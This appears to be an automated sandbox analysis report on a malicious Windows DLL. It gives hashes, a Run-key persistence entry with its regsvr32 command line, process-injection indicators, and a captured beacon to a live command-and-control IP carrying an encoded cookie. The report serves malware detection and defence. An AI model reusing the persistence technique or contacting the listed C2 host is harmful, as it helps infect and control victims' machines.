Analysis
- max time kernel: 52s
- max time network: 103s
- platform: windows10-1703_x64
- resource: win10-20220812-en
- resource tags: arch:x64, arch:x86, image:win10-20220812-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 02/11/2022, 23:01 UTC
Static task: static1
Behavioral task: behavioral1
- Sample: a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb.dll
- Resource: win10-20220812-en
- 5 signatures
- 150 seconds
General
- Target: a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb.dll
- Size: 629KB
- MD5: c9c69f06d8578c13ba70f7ab1f793da7
- SHA1: d9b3f7517277c896c8733f79f26c3dc7091ad58f
- SHA256: a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb
- SHA512: 1ba2b828b31d0fd712343fac529f5d82ff4cfce1dffd47ea52c3b58db2e5db28f090f3a597600d255d27127c51232be9999c6a8f38e96d44356a1e510fe8f9d0
- SSDEEP: 12288:6tGis7p49VmD3OjG7QbBtLu5WhNye5JHKVu6cig1Doa:6tGis1T3OjueLhhd5NKAD3
- Score: 10/10
Malware Config
Signatures
- Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | regsvr32.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bxLPxWBKtzwOqdi.dll = "C:\\Windows\\system32\\regsvr32.exe \"C:\\Windows\\system32\\MyNzhzM\\bxLPxWBKtzwOqdi.dll\"" | regsvr32.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid | Process
  2496 | regsvr32.exe
  2496 | regsvr32.exe
  2780 | regsvr32.exe
  2780 | regsvr32.exe
  2780 | regsvr32.exe
  2780 | regsvr32.exe
- Suspicious behavior: RenamesItself (1 IoC)
  pid | Process
  2496 | regsvr32.exe
- Suspicious use of WriteProcessMemory (2 IoCs)
  description | pid | Process | procid_target
  PID 2496 wrote to memory of 2780 | 2496 | regsvr32.exe | 66
  PID 2496 wrote to memory of 2780 | 2496 | regsvr32.exe | 66
Processes
- C:\Windows\system32\regsvr32.exe (PID 2496)
  Command line: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb.dll
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: RenamesItself
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\regsvr32.exe (PID 2780)
    Command line: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MyNzhzM\bxLPxWBKtzwOqdi.dll"
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
Network
- Remote address: 182.162.143.56:443
  Request:
  GET / HTTP/1.1
  Connection: Keep-Alive
  Cookie: QTBd=BSTjci69ZUIM9QyTgkqxfK5UzzzYgM8fyZhp0TRO/pwD6XJYxD9J+3fJB3kVQeZZOu9MmOMX+u7uuBPwSJ0nYInzaF39AbprHFuE2VCxyNFfj1qoZUpHcI8V0t6jnvDYQUvMOU8Ph0RuNLGEbDFH9Kvph8ZpT3XTWnsi/4ZYmM+tzWLEqg+OTYMjT92y6T14yUlpZyvJuV0kH1p6wgAevpCsraiGwG9nk8BkOuLSoSeSyC1SPBaDl/7Hi42cw7mPk3Qj1AvoOrV10CdpdCrtcaDcyhHDwlTrNv9YEXcwlnlWE8MYaE8SsQLDELpiljkrddXRoQwJfwmUpDzf/7UzgirYbQfqjJU=
  Host: 182.162.143.56
  Response:
  HTTP/1.1 200 OK
  Date: Wed, 02 Nov 2022 23:02:23 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
- Flow statistics (column headers not preserved in extraction):
  322 B 7
  322 B 7
  1.2kB 2.7kB 11 10
- HTTP Request: GET https://182.162.143.56/
  HTTP Response: 200